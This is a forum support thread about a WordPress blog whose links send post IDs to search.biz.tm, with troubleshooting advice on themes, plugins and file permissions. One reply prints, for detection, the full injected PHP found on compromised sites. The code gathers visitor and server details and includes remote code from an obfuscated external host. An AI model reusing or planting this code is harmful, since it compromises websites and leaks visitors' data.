WordPress Spam? (8 posts)

  1. cpoteet
    Posted 10 years ago #

    This is an odd one. Whenever I click on an "edit post" link or sometimes even pull up other posts on my blog, I get the post_id passed into a search query to the site: search.biz.tm

    Now, I've checked thoroughly, and I know it's not client spyware, because (1) it happens on none of my other wordpress sites on the same computer and (2) it's happening on several clients.

    Any thoughts? Thanks in advance.


  2. TechGnome
    Posted 10 years ago #

    What plugins do you have activated on it? And are there any activated on this blog that are not on the others? And lastly, what theme are you using?


  3. cpoteet
    Posted 10 years ago #

    I'm running Squible.


    Del.icio.us Integrator
    Search Hilite
    KG Archives
    Live Comment Preview
    PHP Exec
    Customizable Post Listings
    Limit Posts
    Search Pages

  4. Mark (podz)
    Support Maven
    Posted 10 years ago #

    Check ALL your theme files.
    Check date last modified, download them, search for those terms. Make sure that those files have permissions no greater than 644

    If it's being seen in several places then the cause is the common place they share - the server.

  5. TechGnome
    Posted 10 years ago #

    Search PAge --- I'd look into seeing what that plugin does exactly....


  6. cpoteet
    Posted 10 years ago #

    Can anyone else help on this? I even replaced WordPress files, and I just don't know what's going on.

  7. larsalt
    Posted 10 years ago #

    Hi, found this via search engine. I am looking for people with the search.biz.tm problem.

    It messed up my wiki and totaly shut down my mambo portal, by changing and adding dozends of files. I was able to repair the wiki, but the portal was beond repair.

    Look for this code :

    error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>

    search.biz.tm is owned by a customer of a customer of a customer of AboveNet Communications. They are investigating. You might want to write them at abuse@above.net or drop me a mail and I can include your complaint.


  8. awsm1th
    Posted 10 years ago #

    I ran into this in my themes with WordPress (1.5.2). Running a grep thru my entire web directory I discovered that the custom themes for my blogs were both set to 777 for all the .php pages.

    I've setup two blogs and they both had the same issue. I don't remember setting up the custom themes but I may have. If they are part of the inital WordPress install, this should probalby be addressed.

Topic Closed

This topic has been closed to new replies.

About this Topic